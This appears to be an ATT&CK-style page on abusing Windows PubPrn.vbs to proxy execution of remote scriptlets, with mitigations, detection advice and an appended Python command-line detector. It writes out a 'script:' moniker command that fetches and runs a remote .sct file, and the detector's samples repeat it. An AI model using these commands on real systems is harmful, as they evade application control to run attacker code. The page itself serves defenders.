System Script Proxy Execution: PubPrn Script

Other sub-techniques of System Script Proxy Execution (1)

ID | Name
---|---
.001 | PubPrn Script
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via `Cscript.exe`. For example, the following command publishes a printer within the specified domain: `cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com`.(Citation: pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second `script:` parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is `pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct`. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), `PubPrn.vbs` has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to `LDAP://`, rather than the `script:` moniker, which could be used to reference remote code via HTTP(S).
Procedure Examples

Name | Description
---|---
APT32 | APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)
Mitigations

Mitigation | Description
---|---
Execution Prevention | Block execution of code on a system through application control, and/or script blocking.
Behavior Prevention on Endpoint | Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
Detection

Monitor script processes, such as `cscript`, and command-line parameters for scripts like `PubPrn.vbs` that may be used to proxy execution of malicious files.
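The detection guidance above, turned into a small command-line classifier as an added example (not part of the ATT&CK page or any vendor tooling): it flags `cscript`/`wscript` launches of `pubprn.vbs` whose second parameter is not the documented `LDAP://` target, and in particular the `script:` moniker. The sample command lines are constructed, using the `example.invalid` placeholder domain.

```python
import ntpath
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com',
    r'"C:\Windows\System32\cscript.exe" pubprn.vbs 127.0.0.1 script:https://example.invalid/folder/file.sct',
    r'wscript.exe //nologo pubprn.vbs 127.0.0.1 SCRIPT:HTTP://example.invalid/x.sct',
    r'cmd.exe /c dir',
    r'cscript.exe pubprn.vbs 127.0.0.1',
]

SCRIPT_HOSTS = {"cscript", "cscript.exe", "wscript", "wscript.exe"}

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify_pubprn(cmdline):
    """Return None when the command line is not a PubPrn.vbs invocation or is the
    documented LDAP:// usage; otherwise a short label describing the anomaly."""
    tokens = tokenize(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() not in SCRIPT_HOSTS:
        return None
    # Drop script-host switches such as //nologo or //B that precede the script path.
    args = [t for t in tokens[1:] if not t.startswith("//")]
    if not args or ntpath.basename(args[0]).lower() not in ("pubprn", "pubprn.vbs"):
        return None
    params = args[1:]
    if len(params) < 2:
        return "pubprn_missing_second_parameter"
    target = params[1].lower()
    if target.startswith("ldap://"):
        return None                      # expected use: publish a printer to AD DS
    if target.startswith("script:"):
        return "pubprn_script_moniker"   # scriptlet (.sct) moniker, possibly remote
    return "pubprn_non_ldap_target"

def scan(cmdlines):
    """Return (cmdline, label) pairs for every command line worth alerting on."""
    hits = []
    for cmdline in cmdlines:
        label = classify_pubprn(cmdline)
        if label is not None:
            hits.append((cmdline, label))
    return hits

if __name__ == "__main__":
    for cmdline, label in scan(SAMPLE_CMDLINES):
        print(f"{label}: {cmdline}")
```

On Windows 10+ the `LDAP://` restriction makes the `script:` case fail at runtime, but the attempt is still worth alerting on; the other labels catch invocations that a hunt should review manually.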